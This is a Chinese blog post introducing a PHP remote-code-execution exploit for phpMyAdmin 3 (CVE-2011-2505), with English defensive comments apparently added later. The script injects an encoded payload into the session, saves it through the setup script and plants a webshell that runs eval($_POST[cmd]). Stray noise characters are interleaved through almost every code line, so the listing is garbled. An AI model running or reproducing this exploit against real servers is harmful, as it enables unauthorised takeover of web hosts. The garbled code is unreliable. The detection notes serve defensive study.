最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。

昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了一番,写出了这个冷饭exp。由于我搞得晚了,之前已经很多人研究并写了exp,于是我这个属于炒冷饭,权当研究研究打发时间了。
% w6 R( i0 W' X6 e: R8 _' c8 t* }. s0 S
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
' h6 H4 ?9 X8 f: u$ q* d! F2 S6 m; w/ G v$ o' h
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。

于是写了这个php版本的exp,代码如下:
#!/usr/bin/php
) Y& ~" t$ T' \* M8 L f5 G<?php
// NOTE(review): this listing is a pasted proof-of-concept with stray text interleaved in
// nearly every line, so it is not valid PHP as shown. It is annotated below for vulnerability
// analysis; the security-relevant points are the preconditions it depends on and the request
// pattern it leaves in web-server logs.
$ b; j1 }3 ]$ B+ v) \, g. o% U8 oprint_r('
8 C% `% j3 ]6 ]% \+---------------------------------------------------------------------------+) I' ]2 g( ^9 Y7 R7 C" S
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]9 q" H2 E& I- P& W' {1 ?+ K r& U
by oldjun(www.oldjun.com)
7 m N) s B0 `! Qwelcome to www.t00ls.net
" K! L+ ]. _" J" W! I9 ~8 Jmail: oldjun@gmail.com; a: c" b$ E5 X( O" d" |
Assigned CVE id: CVE-2011-2505
& L# i' k* ]8 W% ^4 l) F- e+---------------------------------------------------------------------------+: J7 I( L" v3 @9 Y: [
');3 l: q5 w( N. A; T+ k4 R5 T/ L
W" I6 S3 X; G# i: ]0 |/**
+ E6 ~4 z& \! }* T0 q" Q * working when the directory:"config" exists and is writeable.
( F3 C; U+ E$ O6 w8 R. U* j**/, J2 o- O( g1 R9 O8 F6 ?
0 m& @% g/ z5 r. d* H. T+ F
// Usage guard: argv[1] is the target host, argv[2] the URL path of the phpMyAdmin install.
if ($argc < 3) {. D* B2 L# o' |8 n$ `
print_r('
0 j3 o9 | r, d1 z( L+ s+---------------------------------------------------------------------------+
" s$ f$ c7 z o, q6 xUsage: php '.$argv[0].' host path4 x! {+ \; R, z6 d0 Y4 T1 s9 Y
host: target server (ip/hostname)
$ W) l- {" s6 C# t2 C( Xpath: path to pma3
4 a, v0 s4 N2 F# @9 gExample:
! L" o& B! r& v, }! aphp '.$argv[0].' localhost /pma/
* U6 w; K) l( W+ b$ j' y% X+---------------------------------------------------------------------------+
" Q+ T+ q7 M- p5 ]& d- c7 t8 ?" p');6 k; R4 m% x+ v) R. X" f' S" _: \ Q
exit;* [ d- z' L& _% I$ r7 ^% S# e& F+ G) ~
}
( p( h+ k; L9 T7 E' f; W6 E( i& U- [5 k
// Both values are read by php_request() below through `global`, so every request is sent
// relative to $path on $host. No credentials are taken anywhere: host and path are the only input.
$host = $argv[1];7 W* b8 R5 \( [7 L3 o/ \
$path = $argv[2];& y4 l' Y' i3 U3 q; r2 z9 n
2 T- V& J. E- w9 H% N3 [7 ~; q M7 `
/**
" N: o" T* n$ k% l; ` * Try to determine if the directory:"config" exists
! ?7 J; Y3 `5 ?) `5 m**/
// Step 1: probe <path>config/ and treat any '404' substring in the raw response as "absent".
// The script's own precondition (docblock above) is that config/ exists and is writable, i.e.
// the setup directory was left in place after installation; the post calls this the one
// limitation that cannot be worked around. Defender's note: removing config/ from the web
// root, or denying web access to it, takes away both the write target used in step 4 and the
// location of the webshell reported in step 5. The durable fix is the vendor patch for
// CVE-2011-2505 named in the banner.
; @/ Z3 P8 I' S1 fecho "[+] Try to determine if the directory:config exists....\n";
. J- y$ S$ ^6 g$returnstr=php_request('config/');
4 T8 ]% B) B+ d( c6 N e- Vif(strpos($returnstr,'404')){
: M, V7 w6 z5 U4 ~! H8 N j( Q% s exit("[-] Exploit Failed! The directory:config do not exists!\n");
% L6 w% y: A' T) f" ?* x}
/ k! D5 Z6 `6 F
2 Y8 Q# \) u' B% C/**
& a! c8 ]: f* m, d/ l4 d * Try to get token and sessionid
: a! E+ [/ n3 X6 v3 Z**/) A2 @- d, m% y' Q6 Q; e+ s
// Step 2: fetch index.php and pull the phpMyAdmin session cookie (capture group 1) and the
// CSRF token (capture group 3) out of the raw response; both are attached to the requests in
// steps 3 and 4. An unauthenticated GET of index.php is normal traffic and not a signal by itself.
echo "[+] Try to get token and sessionid....\n";
. X p- F ?* n# _: D/ O, f$result=php_request('index.php');# p' y m/ C" m( t4 d' b3 C \
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);( p! k. E. k) X8 p) s1 ^0 V
$token=$resp[3];" Z7 ^! E; d' X; R1 ] X% `3 h0 _( n
$sessionid=$resp[1];9 h3 u' D2 s/ U0 c
if($token && $sessionid){
, }# G$ ]) `: K u N0 r3 S# b2 k echo "[+] tokentoken\n";& a2 ~' N& h; s U* Q5 @: M+ ]
echo "[+] Session IDsessionid\n";' U4 R; u; ]9 ?5 T, D+ r
}else{
1 l5 a6 S5 }9 x exit("[-] Can't get token and Session ID,Exploit Failed!\n");% ? R& C2 I8 @* w; @. t
}
* u" w7 ?* | z* ~. g9 M6 E8 o1 y E: d3 Y, g
/**
k! D; E2 y, r( |6 l* ~2 ? * Try to insert shell into session, P: V" m% m' V2 z V3 M7 i
**/; J9 A7 W: g' ~
// Step 3: the session-manipulation request (the CVE-2011-2505 issue named in the banner). It
// sends `session_to_unset` together with a `_SESSION[ConfigFile][Servers][...]` parameter whose
// array key carries a chr()-encoded PHP payload, using only the token and session cookie from
// step 2 — no login has taken place. Detection note: a request to any phpMyAdmin script whose
// query string contains both `session_to_unset` and `_SESSION[` is a direct signature of this
// attempt and is worth alerting on regardless of which script it targets.
echo "[+] Try to insert shell into session....\n";
+ r+ C, \. i( f- L, Nphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.0 D/ S1 Y( {: e0 ~* R: P. Y
% r& L, K' i- y! Y0 h4 T- y0 Q5 b# F/**' X! |: x3 b. a$ D) `- z7 z
* Try to create webshell, V2 K/ P8 P, p$ p5 W4 _) o- y# G4 B% L
**/
// Step 4: POST to setup/config.php with submit_save=Save so the setup script persists the
// poisoned server entry; the file it writes is presumably config/config.inc.php, which is what
// step 5 checks. Detection note: a POST to setup/config.php on an install where setup is no
// longer in use is itself anomalous and is the second log line to look for.
" |1 M9 n) m! D p, w2 Y- Necho "[+] Try to create webshell....\n";
& v8 r. q- V1 b" E, Ophp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
; y$ s ]( J2 p0 ]; E/ B# R5 p f! t/**' \: Y% p1 U; M0 @3 e* ^3 U3 J" f
* Try to check if the webshell was created successfully; W7 F5 D+ Q8 b# |
**/2 H1 N& q5 A* v# C
// Step 5: fetch config/config.inc.php and look for the marker string 't00ls' used in step 3;
// on a hit the script reports a webshell at config/a.php. Responder's note: a config/config.inc.php
// that the web server will execute, and any unexpected .php file under config/, are the
// artefacts to check for when this pattern shows up in the logs.
echo "[+] Try to check if the webshell was created successfully....\n";0 w( v" V3 ^4 N/ {4 M
$content=php_request('config/config.inc.php');
& Q; U9 c& I& q1 Eif(strpos($content,'t00ls')){
: [+ z; [ _, s/ f$ a$ A( c9 F echo "[+] Congratulations! Expoilt successfully....\n";
( y8 j2 f+ Y2 F$ V: I" C; s% _$ K0 C4 P echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
. u# C8 G2 E* P( a; \}else{
9 p: i3 D' H+ V exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
* h) ~6 O$ w4 L9 w% m% x}5 ]6 h! @2 }: a; g/ P/ ^
. s+ m4 ~& I- O2 |7 x% i
/**
 * Minimal raw-socket HTTP/1.1 client used by every step above.
 *
 * @param string $url    path relative to the global $path (e.g. 'index.php', 'config/')
 * @param string $data   urlencoded request body; any truthy value switches the method to POST
 *                       and adds Content-Type/Content-Length headers
 * @param string $cookie raw Cookie header value, sent verbatim when truthy
 * @return string        the complete raw response (status line, headers and body), unparsed
 *
 * Reads $host and $path from global scope. Connects in the clear to port 80 only, so every
 * request and its full query string are visible to the web server's access log and to any
 * network monitoring in between — this is what makes the step 3/4 pattern detectable.
 * On a failed connect it prints a message and terminates the whole script with die.
 * The socket is never fclose()d here; it is released only when the script exits.
 */
function php_request($url,$data='',$cookie=''){8 r4 B8 O( R7 P% l
global $host, $path;! b9 b! v! m# r) K+ B6 X
6 u$ h! W' {( w; [; {7 c$ E $method=$data?'POST':'GET';
4 G# h/ z) f9 X5 B Z& c# X4 N ?2 R
& L$ J: k9 v, c# N5 H1 I $packet = $method." ".$path.$url." HTTP/1.1\r\n";0 w1 ? K" J" `3 T5 `
$packet .= "Accept: */*\r\n";
+ j9 D, d* D9 {% J! f $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";' d8 G9 ]5 B( R
$packet .= "Host: $host\r\n";6 s m6 K$ g, |
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
{9 s$ G( } ]6 v3 m. I $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
$ b( `; |" b S# i0 m $packet .= $cookie?"Cookie: $cookie\r\n":"";0 M* W* g+ x1 ?5 z; R
$packet .= "Connection: Close\r\n\r\n";. |/ d3 b% [/ D* l( s
$packet .= $data?$data:"";/ F/ I/ f: o* S( m
$ n& |1 ~4 s9 n4 O# m& u) z
// Plain HTTP on port 80, resolved with gethostbyname(); no TLS and no connect timeout given.
$fp = fsockopen(gethostbyname($host), 80);
& G( b5 f/ S& G7 ]: X if (!$fp) {
- G) T5 x+ o: I echo 'No response from '.$host; die;
- r# w' E) t4 e }
; ]+ c% b& {6 S+ w$ S; { fputs($fp, $packet);
* I$ @9 k$ a% l" _
// Read until EOF; this relies on the "Connection: Close" header above so the server ends the stream.
( U: L5 s0 a* E5 g7 x0 g: D a" U $resp = '';. H' S b1 v4 j6 k4 ] v
! @ ]# @5 a0 g9 B5 q9 ^6 N while ($fp && !feof($fp))
- D" n6 Z6 d+ }( R. ^( D $resp .= fread($fp, 1024);: F+ l- P; p1 U+ R3 J* X2 j+ j
4 a* u/ W% S" ?7 D return $resp;8 Y* Z0 @1 n& ^6 R
}
6 U+ E$ D' i4 g& a * i8 S) X) f# W9 q5 b5 \! i i
?>
* y. M: E! J( M. |